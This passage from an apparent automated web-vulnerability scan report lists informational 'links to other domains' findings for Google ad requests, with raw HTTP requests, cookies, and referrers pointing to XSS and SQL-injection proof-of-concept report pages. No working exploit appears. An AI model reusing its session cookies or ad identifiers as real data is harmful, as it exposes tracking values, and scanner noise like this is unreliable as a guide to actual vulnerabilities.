Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:15:36 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14881

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Dell.com/Blades%26adT%3DPoweredge%26adU%3Dwww.LightBound.com%26adT%3DLightBound%2BData%2BStorage%26adU%3Dqualysguard.qualys.com%26adT%3DVulnerability%2BScan%26adU%3Dcoastlinemicro.com/rackserver%26adT%3DRack%2BOptimized%2BServer%26adU%3DSupermicro.com/VirtualizationSolution%26adT%3D6-Core%2B4-Way%2BSuperServers%26gl%3DUS&amp;usg=AFQjCNE0NUjNM8K9jynv0NCeU1a84WuiDQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.340. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303690105&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F24%2Fdork%2Freflected-xss-ghdb-cwe-79-capec-86-swisscomonlineshop.sso.bluewin.ch_80.htm&dt=1303672122383&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303672122443&frm=0&adk=1819763764&ga_vid=1053949345.1303672123&ga_sid=1303672123&ga_hid=233845367&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1018&bih=907&fu=0&ifi=1&dtd=145&xpc=5BSGk5nWPJ&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 19:08:31 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12946

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/24/dork/reflected-xss-ghdb-cwe-79-capec-86-swisscomonlineshop.sso.bluewin.ch_80.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Dell.com/Blades%26adT%3DPoweredge%2BServer%26adU%3Dvulnerability.scan.qualys.com%26adT%3DOnline%2BNetwork%2BSecurity%26adU%3Dwww.Top10HostingList.com%26adT%3DBest%2B10%2BWeb%2BHosting%2BSites%26gl%3DUS&amp;usg=AFQjCNGRKAw8cOxs9iIeQPm0rEAGR6ePcA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.341. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303675460&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F24%2Fdork%2Fhostingcataloguecom%2Fsql-injection-reflected-xss-application-error-dork-ghdb-example-poc-report.html&dt=1303657460258&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303657460264&frm=0&adk=1607234649&ga_vid=1195120407.1303657460&ga_sid=1303657460&ga_hid=1082247561&ga_fc=0&u_tz=-300&u_his=7&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=964&bih=891&fu=0&ifi=1&dtd=25&xpc=5PIBgRsr7w&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:04:17 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4368

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/24/dork/hostingcataloguecom/sql-injection-reflected-xss-application-error-dork-ghdb-example-poc-report.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DSeaEagle.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNGyLN_LsB_N9vWx3q7yAH8NUOJ3eA" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

23.342. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681933&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663933823&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303663933828&frm=1&adk=2614322350&ga_vid=27618213.1303663934&ga_sid=1303663934&ga_hid=2106649071&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:52:11 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 15107

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.dell.com/business%26adT%3DDell%25E2%2584%25A2%2BWeb%2BServer%26adU%3Dwww.doubletake.visionsolutions.com%26adT%3DVirtualization%2BWhitepaper%26adU%3DInfocus.com/MSPRevenue%26adT%3DIncrease%2BMSP%2BRevenue%26adU%3Dtripplite.com/CoolingSolution%26adT%3DPortable%2BAC%2BUnit%26adU%3Dwww.bing.com/Local%26adT%3DAtlanta%2BIrish%2BRestaurants%26gl%3DUS&amp;usg=AFQjCNE15CXKTIcJc8r9vN2jDVcpZUgImQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.343. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680459&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662459098&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662459109&frm=1&adk=2614322350&ga_vid=1877995023.1303662459&ga_sid=1303662459&ga_hid=331947155&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:27:36 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14655

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Dell.com/Blades%26adT%3DSecure%2BServer%26adU%3Darenasportsgrille.com%26adT%3DARENA%2BSports%2BBar%2B%2526amp%253B%2BGrill%26adU%3Dwww.bing.com/Local%26adT%3DAtlanta%2BIrish%2BRestaurants%26adU%3Dentertainmentmetals.com%26adT%3DEntertainment%2BMetals%2BInc.%26adU%3DAPC.com/DataCenterUniversity%26adT%3DRack%2BTechnologies%26gl%3DUS&amp;usg=AFQjCNHrED26mg-gpAjlfbtWHwb6oFtS1A" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.344. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681848&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663848869&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303663848877&frm=1&adk=2614322350&ga_vid=1992392879.1303663849&ga_sid=1303663849&ga_hid=1314924476&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=4069653789&eid=33895130&fu=4&ifi=1&dtd=11 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://pub.retailer-amazon.net/banner_120_600_b.php?search={$keywa6d4b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:50:46 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14859

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</a>&nbsp;<img alt="" class=cbg height=10 src="http://pagead2.googlesyndication.com/pagead/badge/checkout_999999.gif" title="This site accepts Google Checkout" width=19><div class=adb>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Dell.com/Blades%26adT%3DSecure%2BServer%26adU%3Dwww.Isilon.com%26adT%3DDataCenter%2BVirtualization%26adU%3Dtripplite.com/Racks%26adT%3DRack%2BEnclosures%26adU%3DSupermicro.com/VirtualizationSolution%26adT%3D6-Core%2B4-Way%2BSuperServers%26adU%3Dwww.sparco.com%26adT%3DComplete%2BIBM%2BSolutions%26gl%3DUS&amp;usg=AFQjCNFdD_9hVZSJNyKslZZ_gnB3DtY_fA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.345. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680442&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662442484&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662442489&frm=1&adk=2614322350&ga_vid=1411504156.1303662442&ga_sid=1303662442&ga_hid=308051534&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:27:19 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14745

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Dell.com/Blades%26adT%3DSecure%2BServer%26adU%3Darenasportsgrille.com%26adT%3DARENA%2BSports%2BBar%2B%2526amp%253B%2BGrill%26adU%3Dwww.bing.com/Local%26adT%3DAtlanta%2BIrish%2BRestaurants%26adU%3DAPC.com/DataCenterUniversity%26adT%3DRack%2BTechnologies%26adU%3Dwww.proaudiostash.com%26adT%3D19%2526quot%253B%2BLaptop%2BDrawer%26gl%3DUS&amp;usg=AFQjCNGgNZlzSvyITSK29_JLjIVmyKeS4Q" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.346. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681811&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663811627&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303663811639&frm=1&adk=2614322350&ga_vid=1740704322.1303663812&ga_sid=1303663812&ga_hid=1255576543&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=15 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:50:09 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14808

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Dell.com/Blades%26adT%3DSecure%2BServer%26adU%3Dwww.NetApp.com%26adT%3DNetApp%25C2%25AE%2BIT%2BCalculator%26adU%3Dwww.Microsoft.com/Cloud%26adT%3DWhat%2Bis%2BCloud%2BComputing%253F%26adU%3Dwww.vanwagner.com%26adT%3DVan%2BWagner%2BAerial%2BMedia%26adU%3Dwww.coolcapitals.com%26adT%3DRestaurants%2BIn%2BAntwerp%26gl%3DUS&amp;usg=AFQjCNHuJ00zUVpUBOkzKoFUy87qNb0Ikw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.347. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658388948&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303658388984&frm=1&adk=513358139&ga_vid=1609860680.1303658389&ga_sid=1303658389&ga_hid=486295006&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=44 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:19:46 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12133

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_728_90_a.php%253Fsearch%253D%25257B%2524keyword%25257D%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.google.com%26adT%3DTest%2BAdd%26adU%3Dwww.prismabanners.com%26adT%3DCustom%2BVinyl%2BBanners%26adU%3DMetricStream.com/SOx_Audit%26adT%3DSox%2Baudits%26gl%3DUS&amp;usg=AFQjCNGvJnOkvof-qCuTDXD5waedL0TzxQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.348. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

